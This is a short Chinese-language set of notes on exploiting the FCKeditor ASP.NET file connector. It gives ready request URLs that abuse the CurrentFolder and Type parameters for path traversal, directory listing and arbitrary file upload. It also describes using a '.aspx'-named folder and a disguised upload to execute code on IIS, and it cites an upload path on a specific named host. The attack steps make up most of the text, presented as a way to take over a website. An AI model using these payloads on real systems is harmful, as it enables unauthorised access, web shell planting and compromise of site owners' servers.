1 CurrentFolder 參數，可以在網站中不同目錄新建文件夾，參數使用 ../../來篡改參數，進入不同的目錄 
/browser/default/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=../../..%2F&NewFolderName=aspx.asp 


2 CurrentFolder 參數，根據返回的XML信息可以查看網站所有的目錄，比如 “../../../”進入不同的目錄，讓后通過XML返回的消息就可以看到沒有權限的頁面browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=%2F 

3 上傳文件時，通過修改CurrentFolder參數，可以將文件上傳到不同的目錄 
/browser/default/connectors/aspx/connector.aspx?Command=FileUpload&Type=Image&CurrentFolder=%2F 

4 同時修改Type 和CurrentFolder 參數，可以上傳任意類型文件到網站任意目錄，基本上網站就完蛋了。 
/browser/default/connectors/aspx/connector.aspx?Command=FileUpload&Type=Image&CurrentFolder=%2F 

http://samsungfriend.local.opentide.com.cn/upload/fckroots/Image/asp.asp/asp.asp 



5 通過創建文件夾的功能，創建名字帶有.aspx的文件夾，如：file.aspx等，利用文件解析漏洞，在該文件夾下上傳有代碼的.jpg 或.rar等文件（實際文件是.aspx，把文件名該后綴），上傳之后就可以利用漏洞執行代碼了。 如：www.xxx.com/upload/file.aspx/123.jpg 輸入之后，代碼被成功執行。